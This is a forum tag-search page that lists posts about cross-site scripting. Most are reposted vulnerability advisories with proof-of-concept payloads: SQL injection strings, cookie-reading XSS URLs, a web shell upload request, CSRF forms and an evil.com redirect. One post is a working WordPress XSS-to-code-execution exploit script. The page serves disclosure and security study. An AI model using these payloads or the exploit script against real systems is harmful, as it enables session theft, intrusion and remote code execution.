Jump to content

Search the Community

Showing results for tags 'xss'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Sugestii
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 53 results

  1. XSpear - Official Link Key features Pattern matching based XSS scanning Detect alert confirm prompt event on headless browser (with Selenium) Testing request/response for XSS protection bypass and reflected params Reflected Params Filtered test event handler HTML tag Special Char Useful code Testing Blind XSS (with XSS Hunter , ezXSS, HBXSS, Etc all url base blind test...) Dynamic/Static Analysis Find SQL Error pattern Analysis Security headers(CSP HSTS X-frame-options, XSS-protection etc.. ) Analysis Other headers..(Server version, Content-Type, etc...) Scanning from Raw file(Burp suite, ZAP Request) XSpear running on ruby code(with Gem library) Show table base cli-report and filtered rule, testing raw query(url) Testing at selected parameters Support output format cli json cli: summary, filtered rule(params), Raw Query Support Verbose level (quit / nomal / raw data) Support custom callback code to any test various attack vectors ScreenShot
  2. URL Dumper is an Online scanner SQLi,XSS. Used too get XSS and SQL Injections vulns.. supports multi search engine, trash system, etc.. Features: -Get all page links by advanced technique with regular expression; -XSS Scanner (auto check all page links); -SQLInjection Scanner (auto check all page links); -Multi-Thread engine; -Get many links by search (google/Yahoo/Live Search/Altavista/Terravista) -Search in the page source by regular expression; -View Source (Code/Browser); -Trash system -Database in SQLite to organize the URL’s -Enabled Proxy server Descarca Cod sursa
  3. MySQL Smart Reports version 1.0 suffers from cross site scripting and remote SQL injection vulnerabilities. # Exploit Title: MySQL Smart Reports 1.0 - SQL Injection / Cross-Site Scripting # Dork: N/A # Date: 22.05.2018 # Exploit Author: Azkan Mustafa AkkuA (AkkuS) # Vendor Homepage: https://codecanyon.net/item/mysql-smart-reports-online-report-generator-with-existing-data/16836503 # Version: 1.0 # Category: Webapps # Tested on: Kali linux # Description : It is actually a post request sent by the user to update. You do not need to use post data. You can injection like GET method. ==================================================== # PoC : SQLi : Parameter : id Type : boolean-based blind Demo : http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id=1 Payload : add=true&id=9' RLIKE (SELECT (CASE WHEN (8956=8956) THEN 9 ELSE 0x28 END))-- YVFC Type : error-based Demo : http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id=1 Payload : add=true&id=9' AND (SELECT 3635 FROM(SELECT COUNT(*),CONCAT(0x716a6a7671,(SELECT (ELT(3635=3635,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HEMo Type : AND/OR time-based blind Demo : http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id=1 Payload : add=true&id=9' AND SLEEP(5)-- mcFO ==================================================== # PoC : XSS : Payload : http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id=' </script><script>alert(1)</script>a; Source
  4. https://leanpub.com/xss by https://twitter.com/brutelogic
  5. FortiGate SSL VPN Portal versions 5.6.2 and below, 5.4.6 and below, 5.2.12 and below, and 5.0 and below suffer from a cross site scripting vulnerability. ======================================================================= title: FortiGate SSL VPN Portal XSS Vulnerability product: Fortinet FortiOS vulnerable version: see: Vulnerable / tested versions fixed version: see: Solution CVE number: CVE-2017-14186 impact: Medium homepage: https://www.fortinet.com found: 2017-10-02 by: Stefan Viehböck (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Montreal - Moscow Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "From the start, the Fortinet vision has been to deliver broad, truly integrated, high-performance security across the IT infrastructure. We provide top-rated network and content security, as well as secure access products that share intelligence and work together to form a cooperative fabric. Our unique security fabric combines Security Processors, an intuitive operating system, and applied threat intelligence to give you proven security, exceptional performance, and better visibility and control--while providing easier administration." Source: https://www.fortinet.com/corporate/about-us/about-us.html Vulnerability overview/description: ----------------------------------- The FortiGate SSL VPN Portal is prone to a reflected cross-site scripting (XSS) vulnerability. The HTTP GET parameter "redir" is vulnerable. An attacker can exploit this vulnerability by tricking a victim to visit a URL. The attacker is able to hijack the session of the attacked user, and use this vulnerability in the course of spear-phishing attacks, e.g. by displaying a login prompt that sends credentials of victim back to the attacker. Note: This vulnerability is also an open redirect and is very similar to a vulnerability that was fixed in FortiOS in March 2016 (FG-IR-16-004). https://www.fortiguard.com/psirt/fortios-open-redirect-vulnerability Proof of concept: ----------------- The following request exploits the issue: https://vpn.<SERVER>.com/remote/loginredir?redir=javascript:alert(%22XSS%20%22%2Bdocument.location) The server responds with a page that looks as follows: --------------------------------------------------------------------------------------------------- <html><head> <script language="javascript"> document.location=decodeURIComponent("javascript%3Aalert%28%22XSS%20%22%2Bdocument.location%29"); </script> </head></html> --------------------------------------------------------------------------------------------------- Vulnerable / tested versions: ----------------------------- FortiOS 5.6.0 -> 5.6.2 FortiOS 5.4.0 -> 5.4.6 FortiOS 5.2.0 -> 5.2.12 FortiOS 5.0 and below More information can be found at: https://fortiguard.com/psirt/FG-IR-17-242 Vendor contact timeline: ------------------------ 2017-10-02: Contacting vendor through psirt@fortinet.com 2017-10-03: Vendor confirms vulnerability, assigns CVE-2017-14186. Expected fix in version 5.6.3 2017-11-23: Vendor provides update 2017-11-29: Coordinated public release of advisory Solution: --------- FortiOS 5.6 branch: Upgrade to upcoming 5.6.3 (ETA: November 27th) FortiOS 5.4 branch: Upgrade to 5.4.6 special build (*) or upcoming 5.4.7 (ETA Dec 7th) FortiOS 5.2 branch: Upgrade to 5.2.12 special build (*) or upcoming 5.2.13 (ETA: Dec 14th) More information can be found at: https://fortiguard.com/psirt/FG-IR-17-242 Workaround: ----------- Not available. # 0day.today [2017-12-04] # Source: 0day.today
  6. Recent am testat o aplicatie web si am intalnit urmatoarea situatie: doi parametri pe care ii puteam controla erau inclusi intr-un 'href' parametrii respectivi aveau o lungime maxima destul de restrictiva, sa zicem 15 caractere orice continea semnul mai mic (<, inclusiv variante Unicode gen full-length angle bracket) urmat de o litera iti termina sesiunea caracterele speciale nu erau filtrate si nu se folosea HTML-encoding cand valorile respective erau folosite Cam asa arata codul HTML: <a href="https://mataigrasa.com/?param1=XXX&param2=YYY&someotherparamsgohere=whateverman">TROLOL</a> Am folosit urmatoarele valori: param1="onclick='/* param2=*/alert(9)'x=" Atunci codul HTML devine: <a href="https://mataigrasa.com/?param1="onclick='/*&param2=*/alert(9)'x="YYY&someotherparamsgohere=whateverman">TROLOL</a> Param1 inchide atributul 'href' si defineste un 'onclick' in care incep un comment (/*). Param 2 inchide comentul (*/) si introduce codul JS care va fi executat de eventul 'onclick'. Comentariul este folosit ca sa scoata '&param2=' din ecuatie si sa permita concatenarea codului JS. Alte idei/recomandari/sugestii sunt bine venite.
  7. WordPress User Login History plugin version 1.5.2 suffers from a cross site scripting vulnerability. Product: User Login History Wordpress Plugin - https://wordpress.org/plugins/user-login-history/ Vendor: Er Faiyaz Alam Tested version: 1.5.2 CVE ID: CVE-2017-15867 ** CVE description ** Multiple cross-site scripting (XSS) vulnerabilities in the user-login-history plugin through 1.5.2 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) date_from, (2) date_to, (3) user_id, (4) username, (5) country_name, (6) browser, (7) operating_system, or (8) ip_address parameter to admin/partials/listing/listing.php. ** Technical details ** The above-mentioned HTTP GET parameters are directly put into the value attribute of an HTML form field without proper sanitization. An attacker can close the HTML input tag with the "> (%22%3E) expression and inject arbitrary HTML/JavaScript code. Example of the vulnerable code with the date_from parameter (line 21): <td><input readonly="readonly" autocomplete="off" placeholder="<?php _e("From", "user-login-history") ?>" id="date_from" name="date_from" value="<?php echo isset($_GET['date_from']) ? $_GET['date_from'] : "" ?>" class="textfield-bg"></td> ** Proof of Concept ** Example using the user_id parameter: http://<host>/wordpress/wp-admin/admin.php?page=user-login-history&user_id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E ** Solution ** Update to version 1.6. ** Timeline ** 15/10/2017: vendor contacted 15/10/2017: vendor acknowledgment 18/10/2017: fix pushed to GitHub 30/10/2017: fixed release available on WordPress Plugins Store. ** Credits ** Vulnerability discovered by Nicolas Buzy-Debat working at Orange Cyberdefense Singapore (CERT-LEXSI). ** References ** - WordPress-plugin-user-login-history GitHub : error log and xss and some minor improvements https://github.com/faiyazalam/WordPress-plugin-user-login-history/commit/519341a7dece59e2c589b908a636e6cf12a61741 -- Best Regards, Nicolas Buzy-Debat Orange Cyberdefense Singapore (CERT-LEXSI) _________________________________________________________________________________________________________________________ Ce message et ses pieces jointes peuvent contenir des informations confidentielles ou privilegiees et ne doivent donc pas etre diffuses, exploites ou copies sans autorisation. Si vous avez recu ce message par erreur, veuillez le signaler a l'expediteur et le detruire ainsi que les pieces jointes. Les messages electroniques etant susceptibles d'alteration, Orange decline toute responsabilite si ce message a ete altere, deforme ou falsifie. Merci. This message and its attachments may contain confidential or privileged information that may be protected by law; they should not be distributed, used or copied without authorisation. If you have received this email in error, please notify the sender and delete this message and its attachments. As emails may be altered, Orange is not liable for messages that have been modified, changed or falsified. Thank you. # 0day.today [2017-11-01] # Source: 0day.today
  8. Afian AB FileRun version 2017.03.18 suffers from cross site request forgery, cross site scripting, open redirection, remote shell upload, and various other vulnerabilities. SEC Consult Vulnerability Lab Security Advisory < 20171018-0 > ======================================================================= title: Multiple vulnerabilities product: Afian AB FileRun vulnerable version: 2017.03.18 fixed version: 2017.09.18 impact: critical homepage: https://www.filerun.com | https://afian.se found: 2017-08-28 by: Roman Ferdigg (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "FileRun File Manager: access your files anywhere through self-hosted secure cloud storage, file backup and sharing for your photos, videos, files and more. Upload and download large files for easy sharing. Google Drive self-hosted alternative." Source: https://www.filerun.com Business recommendation: ------------------------ By exploiting the vulnerabilities documented in this advisory, an attacker can compromise the web server which has FileRun installed. User files might get exposed through this attack. SEC Consult recommends not to use FileRun until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: ----------------------------------- 1) Path Manipulation When uploading, downloading or viewing files, FileRun uses a parameter to specify the path on the file-system. An attacker can manipulate the value of this parameter to read, create and even overwrite files in certain folders. An attacker could upload malicious files to compromise the webserver. In combination with the open redirect and CSRF vulnerability even an unauthenticated attacker can upload these files to get a shell. Through the shell all user files can be accessed. 2) Stored Cross Site Scripting (XSS) via File Upload The application allows users to upload different file types. It is also possible to upload HTML files or to create them via the application's text editor. Files can be shared using a link or within the FileRun application (in the enterprise version). An attacker can inject JavaScript in HTML files to attack other users or simply create a phishing site to steal user credentials. Remark: In the standard configuration of the FileRun docker image the HttpOnly cookie flag is not set, which means that authentication cookies can be accessed in an XSS attack. This allows easy session hijacking as well. 3) Cross Site Request Forgery (CSRF) The application does not implement CSRF protection. An attacker can exploit this vulnerability to execute arbitrary requests with the privileges of the victim. The only requirement is that a victim visits a malicious webpage. Such a page could be hosted on the FileRun server itself and shared with other users as described in vulnerability 2. Besides others, the following actions can be performed via CSRF if the victim has administrative privileges: - Create or delete users - Change permissions rights of users - Change user passwords If the victim has no administrative privileges, for example the following actions can be performed: - Upload files - Change the email address (for password recovery) 4) Open Redirect Vulnerabilities An open redirect vulnerability in the login and logout pages allows an attacker to redirect users to arbitrary web sites. The redirection host could be used for phishing attacks (e.g. to steal user credentials) or for running browser exploits to infect a victim's machine with malware. The open redirect in the login page could also be used to exploit CSRF (see above). Because the server name in the manipulated link is identical to the original site, phishing attempts may have a more trustworthy appearance. Proof of concept: ----------------- 1) Path Manipulation The URL below is used to read the application file "autoconfig.php", which contains the username and cleartext password of the database. URL: http://$DOMAIN/?module=custom_actions&action=open_in_browser&path=/var/www/html/system/data/autoconfig.php This post request is used to upload a PHP shell in the writable folder avatars: POST /?module=fileman_myfiles&section=ajax&page=up HTTP/1.1 Host: $DOMAIN [...] Content-Type: multipart/form-data; boundary=---------------------------293712729522107 Cookie: FileRunSID=t5h7lm99r1ff0quhsajcudh7t0; language=english DNT: 1 Connection: close -----------------------------293712729522107 Content-Disposition: form-data; name="flowTotalSize" 150 -----------------------------293712729522107 Content-Disposition: form-data; name="flowIsFirstChunk" 1 -----------------------------293712729522107 Content-Disposition: form-data; name="flowIsLastChunk" 1 -----------------------------293712729522107 Content-Disposition: form-data; name="flowFilename" shell.php -----------------------------293712729522107 Content-Disposition: form-data; name="path" /var/www/html/system/data/avatars/ -----------------------------293712729522107 Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: application/octet-stream *web shell payload here* -----------------------------293712729522107-- To execute the uploaded shell a .htaccess file with the contents below can be uploaded in the same folder. Content of .htaccess file: <Files "*"> Order allow,deny Allow from all </Files> The uploaded shell can be accessed by the following URL: http://$DOMAIN/?module=custom_actions&action=open_in_browser&path=/var/www/html/system/data/avatars/shell.php 2) Stored Cross Site Scripting (XSS) via File Upload An HTML file with JavaScript code can be easily uploaded to attack other users. No PoC necessary. 3) Cross Site Request Forgery An example for a CSRF attack would be the following request which changes the email address of the victim: <html> <body> <form action="http://$DOMAIN/?module=fileman&section=profile&action=save" method="POST"> <input type="hidden" name="receive&#95;notifications" value="0" /> <input type="hidden" name="two&#95;step&#95;enabled" value="0" /> <input type="hidden" name="name" value="User" /> <input type="hidden" name="name2" value="A" /> <input type="hidden" name="email" value="newemail&#64;example&#46;com" /> <input type="hidden" name="ext&#45;comp&#45;1009" value="on" /> <input type="hidden" name="current&#95;password" value="" /> <input type="hidden" name="new&#95;password" value="" /> <input type="hidden" name="confirm&#95;new&#95;password" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> The new email address can be used by the attacker to reset the password of the victim. 4) Open Redirect Vulnerabilites The URL below can be used to forward a user to an arbitrary website after the login: http://$DOMAIN/?redirectAfterLogin=aHR0cDovL3d3dy5ldmlsLmNvbQ== The value of the redirect parameter needs to be base64 encoded. To redirect a user after logout, following URL can be used: http://$DOMAIN/?module=fileman&page=logout&redirect=http://evil.com In this case for a successful exploit, the victim has to be logged in. Vulnerable / tested versions: ----------------------------- The regular version of FileRun 2017.03.18 has been tested. It is assumed earlier versions of FileRun are also vulnerable to the issues. Vendor contact timeline: ------------------------ 2017-08-31: Contacting vendor through info@afian.se, info@filerun.com 2017-09-01: Sending unencrypted advisory as requested by vendor 2017-09-04: FileRun fixed the vulnerability "Path Manipulation" 2017-09-12: Requesting a status update 2017-09-13: FileRun informed us that a patch for all vulnerabilities will be released before 2017-09-20 2017-09-16: Patch available 2017-10-18: Public release of security advisory Solution: --------- Update to the latest version available (see https://docs.filerun.com/updating). According to FileRun, all the vulnerabilities are fixed in release 2017.09.18 or higher. For further information see: https://www.filerun.com/changelog Workaround: ----------- No workaround available. Advisory URL: ------------- https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/en/career/index.html Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/en/contact/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Roman Ferdigg / @2017 Site sec-consult.com
  9. WordPress version 4.5.3 Audio Playlist suffers from a cross site scripting vulnerability. CODE: ------------------------------------------------------------------------ WordPress audio playlist functionality is affected by Cross-Site Scripting ------------------------------------------------------------------------ Yorick Koster, July 2016 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ Two Cross-Site Scripting vulnerabilities exists in the playlist functionality of WordPress. These issues can be exploited by convincing an Editor or Administrator into uploading a malicious MP3 file. Once uploaded the issues can be triggered by a Contributor or higher using the playlist shortcode. ------------------------------------------------------------------------ OVE ID ------------------------------------------------------------------------ OVE-20160717-0003 ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was successfully tested on the WordPress version 4.5.3. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ These issues are resolved in WordPress version 4.7.3. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html It was discovered that meta information (ID3) stored in audio files are not properly sanitized in case they are uploaded by a user with the unfiltered_html (generally an Editor or Administrator). The first Cross-Site Scripting vulnerability exists in the function that processes the playlist shortcode, which is done in the wp_playlist_shortcode() method (/wp-includes/media.php). This method creates a <noscript> block for users with JavaScript disabled. The method wp_get_attachment_link() does not perform any output encoding on the link text. Meta information from the audio file is used in the link text, rendering wp_playlist_shortcode() vulnerable to Cross-Site Scripting. The second Cross-Site Scripting issue is DOM-based and exists in the JavaScript file /wp-includes/js/mediaelement/wp-playlist.js (or /wp-includes/js/mediaelement/wp-playlist.min.js). The WPPlaylistView object is used to render a audio player client side. The method renderTracks() uses the meta information from the audio file in a call to jQuery's append() method. No output encoding is used on the meta information, resulting in a Cross-Site Scripting vulnerability. Proof of concept The following MP3 file can be used to reproduce this issue: https://securify.nl/advisory/SFY20160742/xss.mp3 1) upload MP3 file to the Media Library (as Editor or Administrator). 2) Insert an Audio Playlist in a Post containing this MP3 (Create Audio Playlist). ------------------------------------------------------------------------ Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its goal is to contribute to the security of popular, widely used OSS projects in a fun and educational way. Sursa/Source: https://packetstormsecurity.com/files/141491/WordPress-4.5.3-Audio-Playlist-Cross-Site-Scripting.html
  10. Title: XSS and SQLi in huge IT gallery v1.1.5 for Joomla Fixed: v1.1.7 Author: Larry W. Cashdollar, @_larry0 and Elitza Neytcheva, @ElitzaNeytcheva Date: 2016-07-14 Download Site: http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-pro Vendor: huge-it.com Vendor Notified: 2016-07-15, fixed 2016-07-23 Vendor Contact: info@huge-it.com Description: The plugin allows you to add multiple images to the gallery, create countless galleries, add a description to each of them, as well as make the same things with video links. Vulnerability: The attacker must be logged in with at least manager level access or access to the administrative panel to exploit this vulnerability: SQL in code via id parameter: ./administrator/components/com_gallery/models/gallery.php 51 public function getPropertie() { 52 $db = JFactory::getDBO(); 53 $id_cat = JRequest::getVar('id'); 54 $query = $db->getQuery(true); 55 $query->select('#__huge_itgallery_images.name as name,' 56 . '#__huge_itgallery_images.id ,' 57 . '#__huge_itgallery_gallerys.name as portName,' 58 . 'gallery_id, #__huge_itgallery_images.description as description,image_url,sl_url,sl_type,link_target,#__huge_itg allery_images.ordering,#__huge_itgallery_images.published,published_in_sl_width'); 59 $query->from(array('#__huge_itgallery_gallerys' => '#__huge_itgallery_gallerys', '#__huge_itgallery_images' => '#__huge_itg allery_images')); 60 $query->where('#__huge_itgallery_gallerys.id = gallery_id')->where('gallery_id=' . $id_cat); 61 $query->order('ordering desc'); 62 64 $db->setQuery($query); 65 $results = $db->loadObjectList(); 66 return $results; 67 } XSS is here: root@Joomla:/var/www/html# find . -name "*.php" -exec grep -l "echo \$_GET" {} \; ./administrator/components/com_gallery/views/gallery/tmpl/default.php root@Joomla:/var/www/html# find . -name "*.php" -exec grep -n "echo \$_GET" {} \; 256: <a class="modal" rel="{handler: 'iframe', size: {x: 800, y: 500}}" href="index.php?option=com_gallery&view=video&tmpl=component&pid=<?php echo $_GET['id']; ?>" title="Image" > CVE Assignments:A CVE-2016-1000113 XSS,A CVE-2016-1000114 SQL Injection JSON: Export Exploit Code: XSS PoC http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=1--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E SQLi PoC http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=SQLiHERE $ sqlmap --load-cookies=cookies.txt -u "http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=*" --dbms mysql Screen Shots: Advisory:A http://www.vapidlabs.com/advisory.php?v=164 via
  11. STATE:DUPLICATE bugbounty:https://hackerone.com/pornhub
  12. sleed

    MailChimp

    Vendor: Mailchimp.com Type of Vuln.: XSS Stored Reported. PoC * :
  13. Nu am de gand sa discut despre bill well, dal in zmau, dar nu e tot ala, si cu chrome a ceva aiurea de tot,
  14. Goke

    Easy XSS chall

    Un mic XSS ca ne plictisim cu totii asa... 63:61:72:74:69:64:65:6a:6f:63:2e:72:6f
  15. sleed

    [XSS] Barracuda

    Vendor: Barracuda [ Principal Domain ] XSS Stored Status Raported PoC*:
  16. Exploit that uses a WordPress cross site scripting flaw to execute code as the administrator. /* Author: @evex_1337 Title: Wordpress XSS to RCE Description: This Exploit Uses XSS Vulnerabilities in Wordpress Plugins/Themes/Core To End Up Executing Code After The Being Triggered With Administrator Previliged User. ¯\_(?)_/¯ Reference: [url]http://research.evex.pw/?vuln=14[/url] Enjoy. */ //Installed Plugins Page plugins = (window.location['href'].indexOf('/wp-admin/') != - 1) ? 'plugins.php' : 'wp-admin/plugins.php'; //Inject "XSS" Div jQuery('body').append('<div id="xss" ></div>'); xss_div = jQuery('#xss'); xss_div.hide(); //Get Installed Plugins Page Source and Append it to "XSS" Div jQuery.ajax({ url: plugins, type: 'GET', async: false, cache: false, timeout: 30000, success: function (txt) { xss_div.html(txt); } }); //Put All Plugins Edit URL in Array plugins_edit = [ ]; xss_div.find('a').each(function () { if (jQuery(this).attr('href').indexOf('?file=') != - 1) { plugins_edit.push(jQuery(this).attr('href')); } }); //Inject Payload for (var i = 0; i < plugins_edit.length; i++) { jQuery.ajax({ url: plugins_edit[i], type: 'GET', async: false, cache: false, timeout: 30000, success: function (txt) { xss_div.html(txt); _wpnonce = jQuery('form#template').context.body.innerHTML.match('name="_wpnonce" value="(.*?)"') [1]; old_code = jQuery('form#template div textarea#newcontent') [0].value; payload = '<?php phpinfo(); ?>'; new_code = payload + '\n' + old_code; file = plugins_edit[i].split('file=') [1]; jQuery.ajax({ url: plugins_edit[i], type: 'POST', data: { '_wpnonce': _wpnonce, 'newcontent': new_code, 'action': 'update', 'file': file, 'submit': 'Update File' }, async: false, cache: false, timeout: 30000, success: function (txt) { xss_div.html(txt); if (jQuery('form#template div textarea#newcontent') [0].value.indexOf(payload) != - 1) { // Passed, this is up to you ( skiddies Filter ) injected_file = window.location.href.split('wp-admin') [0] + '/wp-content/plugins/' + file; // [url]http://localhost/wp//wp-content/plugins/504-redirects/redirects.php[/url] throw new Error(''); } } }); } }); } Source : WordPress 4.2.1 XSS / Code Execution
  17. Advisory ID: HTB23253 Product: FreePBX Vendor: Sangoma Technologies Vulnerable Version(s): 12.0.43 and probably prior Tested Version: 12.0.43 Advisory Publication: March 18, 2015 [without technical details] Vendor Notification: March 18, 2015 Vendor Patch: March 27, 2015 Public Disclosure: April 22, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2015-2690 Risk Level: Low CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered multiple XSS vulnerabilities in FreePBX, which can be exploited to perform Cross-Site Scripting (XSS) attacks against web application administrators. This vulnerability can be used to steal administratorâs cookies, perform phishing and drive-by-download attacks. 1) Multiple XSS vulnerabilities in FreePBX: CVE-2015-2690 Input passed via multiple HTTP POST parameters to "/admin/config.php" script (when "type" is set to "setup", "display" is set to "digiumaddons", "page" is set to "add-license-form", and "addon" is set to "ffa") is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. The vulnerable HTTP POST parameters are: "add_license_key", "add_license_first_name", "add_license_last_name", "add_license_company", "add_license_address1", "add_license_address2", "add_license_city", "add_license_state", "add_license_post_code", "add_license_country", "add_license_phone", and "add_license_email". The exploitation example below will show JS pop-up displaying "ImmuniWeb": <form action="http://[host]/admin/config.php?type=setup&display=digiumaddons&page=add-license-form&addon=ffa" method="post" name="main"> <input type="hidden" name="add_license_key" value='"><script>alert("ImmuniWeb");</script>'> <input type="hidden" name="add_license_first_name" value='"><script>alert("ImmuniWeb");</script>'> <input type="hidden" name="add_license_last_name" value='"><script>alert("ImmuniWeb");</script>'> <input type="hidden" name="add_license_company" value='"><script>alert("ImmuniWeb");</script>'> <input type="hidden" name="add_license_address1" value='"><script>alert("ImmuniWeb");</script>'> <input type="hidden" name="add_license_address2" value='"><script>alert("ImmuniWeb");</script>'> <input type="hidden" name="add_license_city" value='"><script>alert("ImmuniWeb");</script>'> <input type="hidden" name="add_license_state" value='"><script>alert("ImmuniWeb");</script>'> <input type="hidden" name="add_license_post_code" value='"><script>alert("ImmuniWeb");</script>'> <input type="hidden" name="add_license_country" value='"><script>alert("ImmuniWeb");</script>'> <input type="hidden" name="add_license_phone" value='"><script>alert("ImmuniWeb");</script>'> <input type="hidden" name="add_license_email" value='"><script>alert("ImmuniWeb");</script>'> <input type="hidden" name="add_license_submit" value='Submit'> <input type="submit" id="btn"> </form> <script>document.main.submit()</script> ----------------------------------------------------------------------------------------------- Solution: Update Digium Addons Module of FreePBX installation to version 2.11.0.7 More Information: http://git.freepbx.org/projects/FREEPBX/repos/digiumaddoninstaller/commits/2aad006024b74c9ff53943d3e68527a3dffac855 ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23253 - https://www.htbridge.com/advisory/HTB23253 - Reflected Cross-Site Scripting (XSS) in FreePBX. [2] FreePBX - http://www.freepbx.org - FreePBX is as an open source, web-based PBX solution. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVEÂŽ is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWebÂŽ SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. Source: http://packetstorm.wowhacker.com/1504-exploits/freepbx-xss.txt
  18. Aerosol

    [XSS] olx.ro

    Am mai raportat unul acum 5 zile abia azi a venit raspunsul. Nu e mult dar merge. XSS-ul era in form-ul de adaugare a unui anunt.
  19. ###################################################################### # Exploit Title: Synology.com sub-domain OAuth exchange Reflected XSS (RXSS) # Date: 03/04/2014 # Author: Yann CAM @ Synetis - ASafety # Vendor or Software Link: Synology - Network Attached Storage (NAS) # Version: / # Category: Reflected Cross Site Scripting # Google dork: # Tested on: Synology.com update sub-domain ###################################################################### Synology description : ====================================================================== Synology Inc., is a Taiwanese corporation that specializes in network attached storage (NAS) appliances. Synologyâs line of NAS are known as the DiskStation for desktop models, and RackStation for rack-mount models. Synology's products are distributed worldwide and localized in several languages. Synology's headquarters are located in Taipei, Taiwan with subsidiaries located around the world. Vulnerability description : ====================================================================== A reflected XSS is available in the update.synology.com sub-domain. Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake Synology portals, or capture Synology's users credentials such cookies. It's also possible to interact with the OAuth authentication protocol scenario where the vulnerability is located. This reflected XSS is on GET "state" variable and is not properly sanitized before being used to his page. Proof of Concept : ====================================================================== A non-persistent XSS (RXSS) in "state" GET param is available in the update.synology.com sub-domain during OAuth CloudSync process. Tested on Firefox 33.1.1. If the CloudSync package is deployed in the DSM, it's possible to attach some public clouds to synchronized them with the NAS. During the process to attach the 